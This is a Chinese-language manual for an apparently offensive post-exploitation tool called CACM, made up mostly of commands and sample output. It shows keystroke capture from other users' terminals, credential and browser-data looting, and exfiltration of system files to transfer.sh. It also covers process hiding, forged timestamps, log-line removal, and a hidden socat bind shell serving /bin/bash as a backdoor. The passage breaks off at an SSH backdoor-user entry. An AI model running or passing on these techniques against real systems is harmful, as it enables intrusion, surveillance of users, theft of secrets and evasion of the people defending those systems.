CACM 工具使用教程

📖 简介

CACM (Come and catch me) 是一个高级渗透测试工具，提供了丰富的功能模块用于信息收集、系统发现、权限维持等渗透测试活动。该工具基于 Go 语言开发，支持交互式命令行界面和单命令执行模式。

🚀 快速开始

💻 使用方式

启动方式

# 交互式模式
./CACM
xhelp # 交互式查看帮助

# 单命令执行模式
./CACM -c "命令名 参数"

# 显示帮助
./CACM -h

交互式界面

启动后会看到 CACM 的 ASCII 艺术字和欢迎信息：

 ▗▄▄▖ ▗▄▖  ▗▄▄▖▗▖  ▗▖
▐▌   ▐▌ ▐▌▐▌   ▐▛▚▞▜▌
▐▌   ▐▛▀▜▌▐▌   ▐▌  ▐▌
▝▚▄▄▖▐▌ ▐▌▝▚▄▄▖▐▌  ▐▌ tools

Come and catch me - Advanced Penetration Testing Tool
Version: v1.0 tools
Project: https://github.com/RuoJi6/CACM

🛠️ 核心功能模块

1. 信息收集模块

sub - 子域名发现

功能: 通过 crt.sh 和 ip.thc.org 查询目标域名的所有子域名

ATT&CK: T1590.005 (收集受害者网络信息)

用法:

# 查询单个域名
sub example.com

# 查询多个域名
sub example.com test.com

# 显示详细信息
sub example.com -v

案例:

CACM> sub baidu.com
[*] Querying crt.sh for baidu.com...
[*] Found 156 subdomains from crt.sh
[*] Querying ip.thc.org for baidu.com...
[*] Found 23 additional subdomains from ip.thc.org
[+] Total unique subdomains: 179

www.baidu.com
map.baidu.com
tieba.baidu.com
zhidao.baidu.com
...

ws - 系统信息发现

功能: 全面的系统信息收集，包括系统配置、网络信息、域名等

ATT&CK: T1082 (系统信息发现)

用法:

# 基本信息收集
ws

# 详细模式
ws -v

# 跳过网络信息
ws --no-network

# 输出到文件
ws -o system_info.txt

scan - 端口扫描

功能: 高级端口扫描器，支持服务检测，灵感来自 fscan

ATT&CK: T1046 (网络服务扫描)

用法:

# 扫描单个主机
scan 192.168.1.1

# 扫描网段
scan 192.168.1.0/24

# 指定端口
scan 192.168.1.1 -p 22,80,443,3389

# 指定线程数
scan 192.168.1.0/24 -t 100

# 服务检测
scan 192.168.1.1 -s

案例:

CACM> scan 192.168.1.1 -p 1-1000 -t 50
[*] Starting fscan-style port scan...
[*] Targets: 1 | Ports: 1000 | Threads: 50
[+] 192.168.1.1:22    SSH-2.0-OpenSSH_8.0
[+] 192.168.1.1:80    HTTP/1.1 200 OK
[+] 192.168.1.1:443   HTTPS/1.1 200 OK
[*] Scan completed in 2.3 seconds

2. 系统管理模块

common - 常用命令集合

功能: 提供常用的系统管理命令，灵感来自 hackshell

ATT&CK: T1083 (文件和目录发现)

子命令:

lt: 按时间排序列出文件
ltr: 递归按时间排序列出文件
lss: 按大小排序列出文件
lssr: 递归按大小排序列出文件
psg: 搜索进程
lsg: 搜索文件

用法:

# 按时间列出当前目录文件
common lt

# 递归按时间列出 /var/log
common ltr /var/log

# 按大小列出 /tmp 文件
common lss /tmp

# 搜索 SSH 进程
common psg ssh

# 搜索日志文件
common lsg '\.log$'

xpty - 终端用户发现

功能: 显示所有终端和已登录用户信息

ATT&CK: T1033 (系统所有者/用户发现)

用法:

# 显示所有终端
xpty

# 详细模式
xpty -v

# 仅显示活跃会话
xpty --active

3. 工具下载模块

bin - 静态二进制下载器

功能: 下载各种渗透测试工具的静态编译版本

ATT&CK: T1105 (入口工具传输)

用法:

# 下载单个工具
bin nmap

# 下载多个工具
bin nmap curl jq

# 列出所有可用工具
bin list

# 搜索工具
bin search nmap

# 查看下载记录
bin info

可用工具分类:

网络工具: nmap, ncat, curl, wget, socat, ping, tcpdump
文件工具: fd, find, grep, awk, sed, ripgrep
系统工具: ps, netstat, ss, lsof, busybox, strace
数据工具: jq, base64, hexdump, xxd
安全工具: naabu, fscan, searchall, dddd, gogo

案例:

CACM> bin nmap
[*] Downloading nmap for linux/amd64...
[*] URL: https://bin.pkgforge.dev/x86_64/nmap
[+] Downloaded to: /tmp/nmap (12.3 MB)
[+] Made executable
[*] nmap is ready to use!

4. 内存执行模块

memexec - 内存中执行二进制文件

功能: 在内存中执行二进制文件，无需写入磁盘

ATT&CK: T1055 (进程注入)

用法:

# 从标准输入执行
cat /usr/bin/id | memexec

# 从URL下载并执行
memexec https://example.com/tool

# 执行本地文件
memexec /usr/bin/nmap -sS target.com

# 执行系统命令
memexec id -u

案例:

CACM> echo "#!/bin/bash\necho 'Hello from memory!'" | memexec
[*] Executing binary from stdin...
[+] Binary loaded into memory (45 bytes)
[+] Execution successful
Hello from memory!

5. 进程管理模块

hide - 进程隐藏

功能: 隐藏指定进程，使其不被常规工具发现

ATT&CK: T1055 (进程注入)

用法:

# 隐藏指定PID的进程
hide 1234

# 列出可隐藏的进程
hide list

# 显示隐藏状态
hide status

# 恢复隐藏的进程
hide restore 1234

tit - 用户输入监控

功能: 监控和记录用户在终端中的输入

ATT&CK: T1056 (输入捕获)

用法:

# 列出可监控的进程
tit list

# 监控bash/zsh输入
tit read 1234

# 监控SSH会话输出
tit write 1234

# 调试模式
tit read 1234 --debug

案例:

CACM> tit list
[*] Scanning for monitorable processes...
[+] Found 3 bash processes:
  PID: 1234 - /bin/bash (user: alice)
  PID: 5678 - /bin/zsh (user: bob)
  PID: 9012 - /bin/bash (user: root)

CACM> tit read 1234
[*] Monitoring PID 1234 (/bin/bash)...
[+] Started input monitoring
[2024-01-15 10:30:15] ls -la
[2024-01-15 10:30:20] cat /etc/passwd
[2024-01-15 10:30:25] sudo su -

6. 文件操作模块

enc/dec - 文件加密解密

功能: 对文件进行加密和解密操作

ATT&CK: T1027 (混淆文件或信息)

用法:

# 加密文件
enc secret.txt

# 解密文件
dec secret.txt.enc

# 指定密码
enc secret.txt -p mypassword

# 批量加密
enc *.txt

shred - 安全删除文件

功能: 安全删除文件，防止数据恢复

ATT&CK: T1070.004 (文件删除)

用法:

# 安全删除单个文件
shred sensitive.txt

# 删除多个文件
shred *.log

# 指定覆写次数
shred -n 7 secret.txt

# 删除后移除文件
shred -u temp.txt

7. 网络工具模块

dns - DNS查询工具

功能: 执行各种DNS查询操作

ATT&CK: T1590.005 (收集受害者网络信息)

用法:

# 基本DNS查询
dns example.com

# 指定记录类型
dns example.com A
dns example.com MX
dns example.com TXT

# 反向DNS查询
dns -r 8.8.8.8

# 使用指定DNS服务器
dns example.com -s 8.8.8.8

案例:

CACM> dns baidu.com
[*] Resolving baidu.com...
[+] A Record: 110.242.68.66
[+] A Record: 39.156.66.10

CACM> dns baidu.com MX
[*] Querying MX records for baidu.com...
[+] MX: 10 mx.maillb.baidu.com
[+] MX: 15 mx1.baidu.com
[+] MX: 20 mx50.baidu.com

rdns - 批量反向DNS查询

功能: 对IP地址范围进行批量反向DNS查询，使用多个公共数据库

ATT&CK: T1590.005 (收集受害者网络信息)

用法:

# 查询单个IP
rdns 8.8.8.8

# 查询IP范围
rdns 192.168.1.1-192.168.1.100

# 查询网段
rdns 192.168.1.0/24

# 指定线程数
rdns 192.168.1.0/24 -t 50

# 详细模式
rdns 8.8.8.8 -v

# 输出到文件
rdns 192.168.1.0/24 -o rdns_results.txt

案例:

CACM> rdns 8.8.8.8
[*] Reverse DNS lookup for 8.8.8.8...
[*] Querying multiple databases...
[+] PTR: dns.google
[+] Additional info from Shodan: Google Public DNS
[+] ASN: AS15169 (Google LLC)

CACM> rdns 192.168.1.0/24 -t 20
[*] Scanning 254 IPs with 20 threads...
[+] 192.168.1.1: router.local
[+] 192.168.1.10: server01.company.local
[+] 192.168.1.15: workstation-alice.company.local
[*] Completed: 254/254 IPs scanned

dl - 多协议下载工具

功能: 使用多种方法下载文件，支持curl/wget/python/perl/openssl或原生Go HTTP客户端

ATT&CK: T1071.001 (Web协议)

用法:

# 基本下载
dl https://example.com/file.txt

# 指定输出文件
dl https://example.com/file.txt -o downloaded_file.txt

# 使用特定方法
dl https://example.com/file.txt -m curl
dl https://example.com/file.txt -m wget
dl https://example.com/file.txt -m python
dl https://example.com/file.txt -m perl
dl https://example.com/file.txt -m openssl
dl https://example.com/file.txt -m native

# 添加请求头
dl https://api.example.com/data -H "Authorization: Bearer token123"

# POST请求
dl https://api.example.com/submit -X POST -d "data=value"

# 设置User-Agent
dl https://example.com/file.txt -A "Mozilla/5.0 Custom Agent"

# 跟随重定向
dl https://short.url/redirect -L

# 静默模式
dl https://example.com/file.txt -s

案例:

CACM> dl https://github.com/user/repo/releases/download/v1.0/tool.tar.gz
[*] Downloading using native Go HTTP client...
[*] URL: https://github.com/user/repo/releases/download/v1.0/tool.tar.gz
[*] Size: 15.2 MB
[+] Downloaded to: tool.tar.gz
[*] Download completed successfully

CACM> dl https://api.github.com/repos/user/repo -H "Accept: application/vnd.github.v3+json"
[*] Using curl method...
[+] Response saved to: api_response.json

xbounce - TCP流量转发

功能: 将TCP流量转发到目标主机，实现TCP代理功能

ATT&CK: T1090.001 (内部代理)

用法:

# 基本端口转发
xbounce :8080 target.com:80

# 指定监听地址
xbounce 0.0.0.0:8080 192.168.1.100:22

# 本地端口转发
xbounce 127.0.0.1:9999 internal.server:3306

# 显示连接统计
xbounce :8080 target.com:80 -v

# 后台运行
xbounce :8080 target.com:80 -d

案例:

CACM> xbounce :8080 internal.server:80
[*] Starting TCP proxy...
[*] Listening on: 0.0.0.0:8080
[*] Forwarding to: internal.server:80
[+] Proxy started successfully
[*] Waiting for connections...
[+] New connection: 192.168.1.50:45678 -> internal.server:80
[*] Data transferred: 1.2KB upstream, 5.4KB downstream

xghostip - 幽灵IP网络操作

功能: 使用不存在的IP地址进行网络操作，增强隐蔽性

ATT&CK: T1090.003 (多跳代理)

用法:

# 使用幽灵IP发送请求
xghostip 10.0.0.1 target.com

# 指定源端口
xghostip 192.168.255.254 target.com -p 12345

# 发送特定数据包
xghostip 172.16.0.1 target.com:80 -d "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n"

# 扫描模式
xghostip 10.10.10.10 192.168.1.0/24 -scan

# 详细模式
xghostip 192.168.0.1 target.com -v

案例:

CACM> xghostip 10.255.255.255 target.com:80
[*] Using ghost IP: 10.255.255.255
[*] Target: target.com:80
[*] Crafting packets with spoofed source...
[+] Packets sent successfully
[*] Response handling via raw sockets

8. 系统维持模块

xsu - 用户切换和命令执行

功能: 切换用户身份并执行命令

ATT&CK: T1134.001 (访问令牌操作)

用法:

# 切换到root用户
xsu root

# 切换到指定用户
xsu alice

# 执行单个命令
xsu root "id"

# 执行多个命令
xsu alice "whoami; pwd; ls -la"

# 交互式shell
xsu root -i

# 保持环境变量
xsu alice -e "echo $HOME"

案例:

CACM> xsu root "cat /etc/shadow | head -5"
[*] Switching to user: root
[*] Executing command: cat /etc/shadow | head -5
[+] Command executed successfully
root:$6$xyz...:18500:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::

xhome - 隐藏临时工作目录

功能: 创建和管理隐藏的临时工作目录

ATT&CK: T1564.001 (隐藏文件和目录)

用法:

# 创建隐藏工作目录
xhome

# 指定目录位置
xhome /tmp/.workspace

# 显示当前工作目录
xhome show

# 切换到工作目录
xhome cd

# 清理工作目录
xhome clean

# 设置权限
xhome /opt/.tools -m 700

案例:

CACM> xhome
[*] Creating hidden temporary HOME directory...
[+] Created: /tmp/.cacm_home_a8f3d2
[+] Set permissions: 700
[+] Environment updated: HOME=/tmp/.cacm_home_a8f3d2
[*] Hidden directory ready for use

CACM> xhome show
[*] Current CACM home: /tmp/.cacm_home_a8f3d2
[*] Directory contents:
  .bashrc
  .profile
  tools/

xtmux - 隐藏tmux会话

功能: 创建隐藏的tmux会话，不会在tmux list-sessions中显示

ATT&CK: T1564.001 (隐藏文件和目录)

用法:

# 创建隐藏会话
xtmux new

# 创建命名隐藏会话
xtmux new -s hidden_session

# 连接到隐藏会话
xtmux attach

# 连接到指定隐藏会话
xtmux attach -s hidden_session

# 列出隐藏会话
xtmux list

# 杀死隐藏会话
xtmux kill -s hidden_session

# 在隐藏会话中执行命令
xtmux send -s hidden_session "ls -la"

案例:

CACM> xtmux new -s persistence
[*] Creating hidden tmux session: persistence
[+] Session created with hidden socket
[*] Session will not appear in 'tmux list-sessions'
[+] Connected to hidden session: persistence

# 在另一个终端
$ tmux list-sessions
# (不会显示persistence会话)

CACM> xtmux list
[*] Hidden tmux sessions:
  persistence (1 window, created 2024-01-15 10:30)
  backup_shell (2 windows, created 2024-01-15 09:15)

xssh - 隐蔽SSH连接

功能: 使用隐蔽特性静默登录远程主机

ATT&CK: T1021.004 (SSH)

用法:

# 基本SSH连接
xssh [email protected]

# 指定端口
xssh [email protected] -p 2222

# 使用密钥文件
xssh [email protected] -i /path/to/key

# 隐蔽模式（无日志记录）
xssh [email protected] --stealth

# 执行单个命令
xssh [email protected] "uname -a"

# 端口转发
xssh [email protected] -L 8080:localhost:80

# 动态端口转发（SOCKS代理）
xssh [email protected] -D 1080

# 后台运行
xssh [email protected] -f -N -L 8080:localhost:80

案例:

CACM> xssh [email protected] --stealth
[*] Establishing stealth SSH connection...
[*] Target: [email protected]:22
[*] Disabling host key checking...
[*] Suppressing connection logs...
[+] Connected successfully
[*] Session established with stealth features

admin@target:~$ whoami
admin
admin@target:~$ w
 10:30:15 up 5 days,  2:15,  0 users,  load average: 0.00, 0.01, 0.05
# (当前连接不会显示在w命令输出中)

xscp - 隐蔽文件传输

功能: 使用SCP静默传输文件，具有隐蔽特性

ATT&CK: T1021.004 (SSH)

用法:

# 上传文件
xscp local_file.txt [email protected]:/tmp/

# 下载文件
xscp [email protected]:/etc/passwd ./

# 递归传输目录
xscp -r /local/dir [email protected]:/remote/dir

# 指定端口
xscp -P 2222 file.txt [email protected]:/tmp/

# 使用密钥
xscp -i /path/to/key file.txt [email protected]:/tmp/

# 隐蔽模式
xscp --stealth file.txt [email protected]:/tmp/

# 压缩传输
xscp -C large_file.tar [email protected]:/tmp/

# 保持文件属性
xscp -p file.txt [email protected]:/tmp/

案例:

CACM> xscp --stealth /etc/passwd [email protected]:/tmp/.backup
[*] Starting stealth SCP transfer...
[*] Source: /etc/passwd
[*] Destination: [email protected]:/tmp/.backup
[*] Suppressing transfer logs...
[+] Transfer completed: 2.1KB in 0.3s
[*] No traces left in system logs

9. 实用工具模块

wfind - 可写目录查找

功能: 查找系统中的可写目录，用于权限提升和文件存储

ATT&CK: T1083 (文件和目录发现)

用法:

# 查找所有可写目录
wfind

# 查找指定路径下的可写目录
wfind /var /tmp /opt

# 查找当前用户可写的目录
wfind --user-only

# 查找全局可写目录
wfind --world-writable

# 详细模式（显示权限）
wfind -v

# 排除常见目录
wfind --exclude-common

# 输出到文件
wfind -o writable_dirs.txt

案例:

CACM> wfind
[*] Scanning for writable directories...
[*] Checking common locations...
[+] /tmp (drwxrwxrwt)
[+] /var/tmp (drwxrwxrwt)
[+] /dev/shm (drwxrwxrwt)
[+] /home/alice (drwxr-xr-x)
[+] /var/log/apache2 (drwxr-xr-x)
[*] Found 5 writable directories

CACM> wfind --world-writable -v
[*] Scanning for world-writable directories...
[+] /tmp
    Permissions: drwxrwxrwt (1777)
    Owner: root:root
    Sticky bit: Yes
[+] /var/tmp
    Permissions: drwxrwxrwt (1777)
    Owner: root:root
    Sticky bit: Yes

hgrep - 人性化文本搜索

功能: 增强的grep功能，输出格式化结果，支持中文

ATT&CK: T1083 (文件和目录发现)

用法:

# 基本搜索
hgrep "password" /etc/

# 搜索密码相关信息
hgrep password

# 正则表达式搜索
hgrep -E "^admin:" /etc/passwd

# 忽略大小写
hgrep -i "error" /var/log/

# 递归搜索
hgrep -r "secret" /home/

# 搜索中文内容
hgrep "密码" /var/log/

# 显示行号
hgrep -n "config" /etc/

# 显示匹配前后的行
hgrep -C 3 "error" /var/log/syslog

# 只显示文件名
hgrep -l "password" /etc/*

# 排除二进制文件
hgrep -I "secret" /usr/bin/

案例:

CACM> hgrep password
[*] Searching for 'password' patterns...
[*] Scanning common locations...

📁 /etc/mysql/my.cnf
   Line 15: password = secret123
   Context: Database configuration file

📁 /home/alice/.bashrc
   Line 42: export DB_PASSWORD=admin123
   Context: Environment variable

📁 /var/log/auth.log
   Line 1205: Failed password for alice from 192.168.1.100
   Context: Authentication log

[+] Found 3 matches in 3 files

find_subdomains - 子域名文件搜索

功能: 在文件中搜索子域名信息

ATT&CK: T1083 (文件和目录发现)

用法:

# 搜索指定域名的子域名
find_subdomains example.com

# 在指定目录搜索
find_subdomains example.com /var/log /etc

# 搜索多个域名
find_subdomains example.com test.com

# 详细模式
find_subdomains example.com -v

# 输出到文件
find_subdomains example.com -o subdomains.txt

# 包含通配符域名
find_subdomains example.com --include-wildcards

案例:

CACM> find_subdomains company.com
[*] Searching for subdomains of company.com...
[*] Scanning configuration files...

📁 /etc/nginx/sites-available/default
   Line 25: server_name api.company.com;
   Line 30: server_name admin.company.com;

📁 /var/log/apache2/access.log
   Line 1523: "GET / HTTP/1.1" 200 - "mail.company.com"
   Line 2041: "POST /login HTTP/1.1" 302 - "vpn.company.com"

📁 /etc/hosts
   Line 15: 192.168.1.100 internal.company.com

[+] Found 5 unique subdomains:
  api.company.com
  admin.company.com
  mail.company.com
  vpn.company.com
  internal.company.com

transfer - 文件上传服务

功能: 将文件或目录上传到文件共享服务

ATT&CK: T1041 (数据渗透)

用法:

# 上传单个文件
transfer file.txt

# 上传目录
transfer /path/to/directory

# 指定服务
transfer file.txt --service bashupload
transfer file.txt --service transfer.sh
transfer file.txt --service oshi.at

# 设置过期时间
transfer file.txt --expire 7d

# 加密上传
transfer sensitive.txt --encrypt

# 批量上传
transfer *.log

# 压缩后上传
transfer /large/directory --compress

案例:

CACM> transfer /etc/passwd
[*] Uploading /etc/passwd...
[*] Using service: transfer.sh
[*] File size: 2.1KB
[+] Upload successful!
[*] Download URL: https://transfer.sh/abc123/passwd
[*] URL expires in: 14 days
[*] Direct download: curl https://transfer.sh/abc123/passwd

CACM> transfer /var/log --compress
[*] Compressing directory: /var/log
[*] Archive size: 15.2MB
[*] Uploading compressed archive...
[+] Upload successful!
[*] Download URL: https://bashupload.com/xyz789/logs.tar.gz

10. 安全检测与规避模块

edr - EDR/AV检测

功能: 检测系统中的EDR和杀毒软件产品

ATT&CK: T1518.001 (安全软件发现)

用法:

# 检测所有安全产品
edr

# 详细模式
edr -v

# 检测特定类型
edr --type av
edr --type edr
edr --type firewall

# 输出到文件
edr -o security_products.txt

# 静默模式
edr --quiet

案例:

CACM> edr
[*] Scanning for EDR/AV security products...
[*] Checking running processes...
[*] Checking installed software...
[*] Checking system services...

🛡️  Detected Security Products:
[+] CrowdStrike Falcon (EDR)
    Process: falconctl
    Service: CSFalconService
    Status: Running

[+] Windows Defender (AV)
    Process: MsMpEng.exe
    Service: WinDefend
    Status: Running

[+] Symantec Endpoint Protection (AV/EDR)
    Process: ccSvcHst.exe
    Service: SepMasterService
    Status: Running

⚠️  Recommendations:
- High detection risk environment
- Consider stealth techniques
- Avoid suspicious process names

lpe - 权限提升检测

功能: 运行linPEAS/winPEAS进行权限提升检测

ATT&CK: T1068 (利用漏洞进行权限提升)

用法:

# 运行权限提升检测
lpe

# 指定检测类型
lpe --linux
lpe --windows

# 详细输出
lpe -v

# 快速扫描
lpe --fast

# 输出到文件
lpe -o privesc_report.txt

# 只检查特定类别
lpe --check sudo
lpe --check suid
lpe --check capabilities

案例:

CACM> lpe
[*] Starting privilege escalation enumeration...
[*] Downloading linPEAS...
[*] Running comprehensive checks...

🔍 System Information:
[+] OS: Ubuntu 20.04.3 LTS
[+] Kernel: 5.4.0-91-generic
[+] Architecture: x86_64

⚠️  Potential Privilege Escalation Vectors:

🔴 SUID Binaries:
[+] /usr/bin/sudo (CVE-2021-3156 - Baron Samedit)
[+] /usr/bin/pkexec (CVE-2021-4034 - PwnKit)

🟡 Writable Files:
[+] /etc/passwd (world-writable!)
[+] /var/log/auth.log (group-writable)

🟢 Sudo Permissions:
[+] alice ALL=(root) NOPASSWD: /usr/bin/systemctl

💡 Recommendations:
1. Exploit sudo vulnerability (CVE-2021-3156)
2. Check systemctl sudo permissions
3. Investigate writable /etc/passwd

loot - 凭据和秘密收集

功能: 显示常见的秘密和凭据信息

ATT&CK: T1552.001 (凭据文件)

用法:

# 收集所有凭据
loot

# 指定类型
loot --passwords
loot --keys
loot --tokens
loot --certificates

# 搜索特定路径
loot --path /home /opt

# 详细模式
loot -v

# 输出到文件
loot -o credentials.txt

# 包含历史文件
loot --include-history

案例:

CACM> loot
[*] Collecting credentials and secrets...
[*] Scanning common locations...

🔑 SSH Keys:
[+] /home/alice/.ssh/id_rsa (2048-bit RSA)
[+] /home/bob/.ssh/id_ed25519 (Ed25519)
[+] /root/.ssh/authorized_keys (3 keys)

🔐 Password Files:
[+] /etc/shadow (readable!)
[+] /var/backups/passwd.bak
[+] /home/alice/.mysql_history (contains passwords)

🎫 Tokens & API Keys:
[+] /home/alice/.aws/credentials
[+] /opt/app/.env (DATABASE_PASSWORD=secret123)
[+] /var/log/app.log (JWT tokens in logs)

📜 Certificates:
[+] /etc/ssl/private/server.key
[+] /home/alice/.cert/client.p12

💾 Browser Data:
[+] /home/alice/.mozilla/firefox/profiles/cookies.sqlite
[+] /home/bob/.config/google-chrome/Default/Login Data

⚠️  High-Value Targets Found: 12

11. 时间戳操作模块

notime - 时间戳伪装执行

功能: 在指定文件的修改时间执行命令（需要root权限）

ATT&CK: T1070.006 (时间戳操作)

用法:

# 使用文件时间戳执行命令
notime /etc/passwd "touch /tmp/hidden_file"

# 详细模式
notime /var/log/syslog "echo 'stealth' > /tmp/log" -v

# 指定时间戳类型
notime /etc/hosts "ls -la" --mtime
notime /etc/hosts "ls -la" --atime
notime /etc/hosts "ls -la" --ctime

案例:

CACM> notime /etc/passwd "touch /tmp/backdoor"
[*] Target file: /etc/passwd
[*] File mtime: 2024-01-10 08:30:15
[*] Command: touch /tmp/backdoor
[*] Setting system time to: 2024-01-10 08:30:15
[+] Command executed at target timestamp
[*] Restoring system time...
[+] Timestamp manipulation completed

# 检查结果
$ ls -la /tmp/backdoor
-rw-r--r-- 1 root root 0 Jan 10 08:30 /tmp/backdoor

ctime - 修改文件创建时间

功能: 将文件的ctime设置为mtime（需要root权限）

ATT&CK: T1070.006 (时间戳操作)

用法:

# 修改单个文件
ctime /tmp/suspicious_file

# 批量修改
ctime /tmp/*.log

# 递归修改目录
ctime -r /var/log/

# 详细模式
ctime -v /tmp/file

# 备份原时间戳
ctime --backup /tmp/file

案例:

CACM> ctime /tmp/malware.exe
[*] Processing: /tmp/malware.exe
[*] Original ctime: 2024-01-15 10:30:00
[*] Target mtime: 2024-01-10 08:15:30
[+] ctime updated successfully
[*] File now appears created at: 2024-01-10 08:15:30

notime_cp - 时间戳保持复制

功能: 复制文件并保持所有时间戳（birth-time, ctime, mtime, atime）

ATT&CK: T1070.006 (时间戳操作)

用法:

# 基本复制
notime_cp source.txt destination.txt

# 复制目录
notime_cp -r /source/dir /dest/dir

# 详细模式
notime_cp -v source.txt dest.txt

# 保持所有属性
notime_cp -a source.txt dest.txt

# 强制覆盖
notime_cp -f source.txt existing_dest.txt

案例:

CACM> notime_cp /etc/passwd /tmp/passwd_backup
[*] Copying with timestamp preservation...
[*] Source: /etc/passwd
[*] Destination: /tmp/passwd_backup
[*] Preserving: birth-time, ctime, mtime, atime
[+] Copy completed with full timestamp preservation

# 验证时间戳
$ stat /etc/passwd /tmp/passwd_backup
  File: /etc/passwd
  Birth: 2024-01-01 00:00:00.000000000
  Modify: 2024-01-10 08:30:15.123456789
  Change: 2024-01-10 08:30:15.123456789
  Access: 2024-01-15 10:25:30.987654321

  File: /tmp/passwd_backup
  Birth: 2024-01-01 00:00:00.000000000  # 完全相同
  Modify: 2024-01-10 08:30:15.123456789  # 完全相同
  Change: 2024-01-10 08:30:15.123456789  # 完全相同
  Access: 2024-01-15 10:25:30.987654321  # 完全相同

12. 日志清理模块

xlog - 日志清理工具

功能: 从文件中删除包含指定模式的行或清理systemd日志

ATT&CK: T1070.003 (清除命令历史)

用法:

# 从文件中删除包含特定模式的行
xlog /var/log/auth.log "192.168.1.100"

# 清理多个日志文件
xlog /var/log/*.log "suspicious_activity"

# 清理systemd日志
xlog --systemd

# 清理特定服务的日志
xlog --systemd --service ssh

# 清理特定时间范围的日志
xlog --systemd --since "2024-01-15 10:00:00"

# 备份后清理
xlog --backup /var/log/auth.log "failed_login"

# 正则表达式模式
xlog -E /var/log/access.log "192\.168\.1\.(100|101|102)"

# 详细模式
xlog -v /var/log/syslog "error"

案例:

CACM> xlog /var/log/auth.log "192.168.1.100"
[*] Processing: /var/log/auth.log
[*] Pattern: 192.168.1.100
[*] Scanning file for matching lines...
[+] Found 15 matching lines
[*] Creating backup: /var/log/auth.log.backup.20240115
[*] Removing matching lines...
[+] Removed 15 lines containing '192.168.1.100'
[*] File cleaned successfully

CACM> xlog --systemd --service ssh
[*] Clearing systemd journal for service: ssh
[*] Journal size before: 45.2MB
[+] SSH service logs cleared
[*] Journal size after: 42.1MB
[*] Cleared 3.1MB of SSH logs

13. 高级扫描模块

np - 高级秘密扫描器

功能: 支持中文的高级秘密扫描器

ATT&CK: T1552.001 (凭据文件)

用法:

# 基本扫描
np /path/to/scan

# 扫描特定文件类型
np --type config /etc/

# 中文支持扫描
np --chinese /var/log/

# 深度扫描
np --deep /home/

# 输出格式化（建议使用less -R）
np /etc/ | less -R

# 扫描特定模式
np --pattern password /var/

# 排除特定目录
np --exclude /proc,/sys /

# 输出到文件
np /home/ -o secrets_report.txt

案例:

CACM> np /etc/ | less -R
[*] Advanced secret scanner with Chinese support
[*] Scanning: /etc/
[*] Patterns: passwords, keys, tokens, Chinese secrets

🔍 Configuration Files:
📁 /etc/mysql/my.cnf
   🔑 Line 15: password = secret123
   🔑 Line 23: root_password = admin456

📁 /etc/nginx/nginx.conf
   🎫 Line 45: ssl_certificate_key /etc/ssl/private/server.key

🔍 Chinese Content:
📁 /etc/app/config.ini
   🔐 Line 8: 数据库密码 = mysecret123
   🔐 Line 12: API密钥 = abc123def456

🔍 Environment Files:
📁 /etc/environment
   🎫 Line 3: AWS_SECRET_ACCESS_KEY=xyz789abc123

[+] Total secrets found: 6
[+] High-risk items: 3

🎯 实战案例

案例1: 完整内网渗透流程

# 1. 初始信息收集
CACM> ws -v -o system_info.txt
[*] Collecting comprehensive system information...
[+] OS: Ubuntu 20.04.3 LTS
[+] Kernel: 5.4.0-91-generic
[+] CPU: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz (4 cores)
[+] Memory: 8GB total, 2.1GB available
[+] Network interfaces: eth0 (192.168.1.50), docker0 (172.17.0.1)
[+] Domain: company.local

# 2. 检测安全产品
CACM> edr
[*] Scanning for security products...
[+] No EDR detected
[+] Basic firewall: ufw (inactive)
[⚠] Low security environment detected

# 3. 网络发现和端口扫描
CACM> scan 192.168.1.0/24 -p 22,80,443,3389,445,3306 -t 100 -s
[*] Starting comprehensive network scan...
[+] 192.168.1.10:22   SSH-2.0-OpenSSH_7.4 (Ubuntu)
[+] 192.168.1.15:80   Apache/2.4.41 (Ubuntu)
[+] 192.168.1.15:3306 MySQL 8.0.25
[+] 192.168.1.20:443  nginx/1.18.0
[+] 192.168.1.25:3389 Microsoft Terminal Services
[+] 192.168.1.30:445  Samba 4.11.6

# 4. 域名信息收集
CACM> sub company.com
[*] Querying multiple sources...
[+] Found 67 subdomains:
mail.company.com (192.168.1.15)
vpn.company.com (203.0.113.10)
admin.company.com (192.168.1.20)
api.company.com (192.168.1.25)
db.company.com (192.168.1.15)

# 5. DNS信息收集
CACM> dns company.com MX
[+] MX: 10 mail.company.com
CACM> rdns 192.168.1.0/24 -t 20
[+] 192.168.1.10: server01.company.local
[+] 192.168.1.15: web-db.company.local
[+] 192.168.1.20: admin-panel.company.local

# 6. 查找可写目录
CACM> wfind
[+] /tmp (drwxrwxrwt)
[+] /var/tmp (drwxrwxrwt)
[+] /dev/shm (drwxrwxrwt)
[+] /var/www/html/uploads (drwxrwxrwx) ⚠️

案例2: 权限提升与持久化

# 1. 权限提升检测
CACM> lpe
[*] Running privilege escalation enumeration...
[🔴] CRITICAL: /usr/bin/sudo vulnerable to CVE-2021-3156
[🟡] SUID binary: /usr/bin/pkexec (potential CVE-2021-4034)
[🟢] Sudo permissions: alice ALL=(root) NOPASSWD: /usr/bin/systemctl

# 2. 下载渗透工具
CACM> bin nmap socat nc pspy
[*] Downloading static binaries...
[+] nmap: 12.3MB downloaded to /tmp/nmap
[+] socat: 2.1MB downloaded to /tmp/socat
[+] nc: 1.5MB downloaded to /tmp/nc
[+] pspy: 3.2MB downloaded to /tmp/pspy

# 3. 创建隐藏工作环境
CACM> xhome /dev/shm/.workspace
[+] Created hidden workspace: /dev/shm/.workspace
[+] Set permissions: 700
[+] Environment configured

# 4. 建立隐蔽后门
CACM> xtmux new -s persistence
[*] Created hidden tmux session: persistence
[+] Session will not appear in 'tmux list-sessions'

# 在隐藏会话中运行后门
CACM> xtmux send -s persistence "/tmp/socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash"

# 5. 隐藏关键进程
CACM> hide list
[*] Found processes to hide:
  PID: 15234 - socat TCP-LISTEN:4444
CACM> hide 15234
[+] Process 15234 hidden from ps, top, htop

# 6. 监控管理员活动
CACM> tit list
[*] Found admin sessions:
  PID: 9999 - /bin/bash (user: root)
  PID: 8888 - /bin/bash (user: admin)
CACM> tit read 9999
[*] Monitoring root session...
[2024-01-15 14:30:00] systemctl status ssh
[2024-01-15 14:30:15] tail -f /var/log/auth.log
[2024-01-15 14:30:30] mysql -u root -p

ssh_backdoor - SSH后门用户管理

功能: 创建和管理SSH后门用户，实现权限维持

ATT&CK: T1136.001 (创建账户：本地账户)

用法:

# 创建SSH后门用户
ssh_backdoor add backup_user
